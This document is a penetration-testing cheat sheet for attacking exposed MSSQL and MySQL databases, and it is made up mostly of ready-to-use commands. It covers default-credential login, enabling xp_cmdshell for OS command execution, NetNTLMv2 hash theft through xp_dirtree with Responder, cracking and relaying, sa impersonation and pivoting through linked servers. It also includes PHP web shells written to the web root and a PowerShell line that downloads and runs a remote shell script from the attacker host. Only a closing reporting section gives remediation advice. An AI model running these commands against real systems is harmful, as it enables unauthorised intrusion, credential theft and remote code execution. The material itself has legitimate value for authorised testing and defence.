🛡️ Methodology Checklist
- Identify DB type (MSSQL/MySQL/PostgreSQL) from nmap or banner
- Test default/blank credentials
- If MSSQL: enable xp_cmdshell for OS command execution
- Check FILE privilege for LFI (MySQL)
- Write webshell via SELECT INTO OUTFILE (MySQL)
- NTLM capture via xp_dirtree (MSSQL): trigger Responder
- Enumerate linked servers for lateral movement
- Impersonation: EXECUTE AS LOGIN if lower-priv account
🎯 Operational Context
Use when: MSSQL or MySQL is exposed or accessible — default creds, xp_cmdshell for RCE, UDF injection, linked server abuse.
Think Dumber First: nxc mssql [TARGET] -u sa -p sa and nxc mssql [TARGET] -u sa -p '' — sa with blank or default password is common on unmanaged SQL installs. Then enable xp_cmdshell for OS command execution.
Skip when: SQL is only accessible via application — use SQL injection through the app instead of direct connection.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nmap -Pn -sV -sC -p1433,3306 [TARGET_IP] | SQL service scan |
mssqlclient.py -p 1433 [USER]@[TARGET_IP] | Connect to MSSQL from Linux (Impacket) |
mssqlclient.py -windows-auth [DOMAIN]/[USER]:[PASS]@[TARGET_IP] | Connect to MSSQL with Windows auth |
sqsh -S [TARGET_IP] -U .\[USER] -P '[PASS]' | Connect to MSSQL via sqsh (supports piping) |
mysql -u [USER] -p[PASS] -h [TARGET_IP] | Connect to MySQL (no space after -p) |
SHOW DATABASES; | MySQL: list databases |
USE [db]; SHOW TABLES; | MySQL: list tables in database |
SELECT name FROM master.dbo.sysdatabases; GO | MSSQL: list databases |
SELECT table_name FROM [db].INFORMATION_SCHEMA.TABLES; GO | MSSQL: list tables |
SELECT * FROM [table]; GO | Dump table contents |
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; | MSSQL: enable xp_cmdshell (requires sysadmin) |
xp_cmdshell 'whoami'; | MSSQL: execute system command |
EXEC master..xp_dirtree '\\[LHOST]\share\'; | MSSQL: steal service account NetNTLMv2 hash |
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; | MSSQL: check impersonation rights |
EXECUTE AS LOGIN = 'sa'; | MSSQL: impersonate sa (if permitted) |
SELECT srvname, isremote FROM sysservers; | MSSQL: list linked servers |
EXECUTE('select @@servername') AT [LINKED_SERVER]; | MSSQL: execute on linked server |
SELECT LOAD_FILE('/etc/passwd'); | MySQL: read file (requires FILE privilege) |
SELECT "<?php system($_GET['c']); ?>" INTO OUTFILE '/var/www/html/shell.php'; | MySQL: write web shell to disk |
sudo responder -I tun0 | Capture NTLM hash from xp_dirtree callback |
hashcat -m 5600 hash.txt rockyou.txt | Crack captured NetNTLMv2 (mode 5600) |
🔬 Deep Dive & Workflow
MSSQL Attack Progression
1. Connect (mssqlclient.py / sqsh)
2. Enumerate databases and tables
3. Dump sensitive data (users, creds, PII)
4. Check privilege level: SELECT IS_SRVROLEMEMBER('sysadmin')
5. If sysadmin → enable xp_cmdshell → OS command execution
6. If not sysadmin → check IMPERSONATE rights → escalate to sa
7. Check linked servers → chain to other DBs/hosts
xp_cmdshell — MSSQL OS Execution
Built-in stored procedure disabled by default but re-enabling requires only sysadmin:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell 'whoami';
xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://[LHOST]/shell.ps1\")"';xp_dirtree — NetNTLMv2 Hash Theft
Forces MSSQL’s service account to authenticate to an SMB share — captured by Responder:
-- On target (MSSQL)
EXEC master..xp_dirtree '\\[LHOST]\share\';
-- On attacker (before running the SQL)
sudo responder -I tun0
-- Then crack
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
-- Or relay if SMB signing is disabled on other targets
impacket-ntlmrelayx -t [OTHER_TARGET] -smb2supportMSSQL User Impersonation
-- Check who you can impersonate
SELECT distinct b.name FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
-- Escalate
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER; -- verify: should return 'sa'
-- Now enable xp_cmdshell
EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;MySQL File Operations
-- Read files (requires FILE privilege)
SELECT LOAD_FILE('/etc/passwd');
SELECT * FROM OPENROWSET(BULK N'C:/Windows/win.ini', SINGLE_CLOB) AS Contents; -- MSSQL
-- Write web shell (requires write access to web root)
SELECT "<?php system($_GET['c']); ?>" INTO OUTFILE '/var/www/html/shell.php';MSSQL Write File (Ole Automation)
sp_configure 'show advanced options', 1; RECONFIGURE;
sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
DECLARE @OLE INT; DECLARE @FileID INT;
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\shell.php', 8, 1;
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>';
EXECUTE sp_OADestroy @FileID; EXECUTE sp_OADestroy @OLE;🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| xp_cmdshell disabled | Default secure configuration | Enable: EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; |
| MSSQL connection refused | Non-standard port or named instance | Enumerate instances: nmap -p 1433,1434 --script ms-sql-info [TARGET]; try UDP 1434 for browser service |
| impacket-mssqlclient auth fails | Windows auth vs SQL auth mismatch | Try both: -windows-auth flag for Windows auth; without for SQL auth |
| MySQL UDF injection fails | Plugin dir not writable | Check: SHOW VARIABLES LIKE 'plugin_dir'; requires write permission to that path |
| Linked server commands fail | Permissions on linked server | Use OPENQUERY: SELECT * FROM OPENQUERY([LINKED_SERVER], 'SELECT SYSTEM_USER') |
📝 Reporting Trigger
Finding Title: SQL Server xp_cmdshell Enables Operating System Command Execution Impact: Enabled xp_cmdshell on MSSQL Server allows any authenticated SQL user to execute arbitrary OS commands as the SQL service account, enabling lateral movement, credential dumping, and persistence without additional exploitation. Root Cause: xp_cmdshell enabled on MSSQL instance. SQL Server service account running with excessive OS privileges. Recommendation: Disable xp_cmdshell and all advanced dangerous options. Run SQL Server as a dedicated low-privilege service account. Implement SQL Server Audit to log all DDL and configuration changes. Restrict SQL access to application accounts only.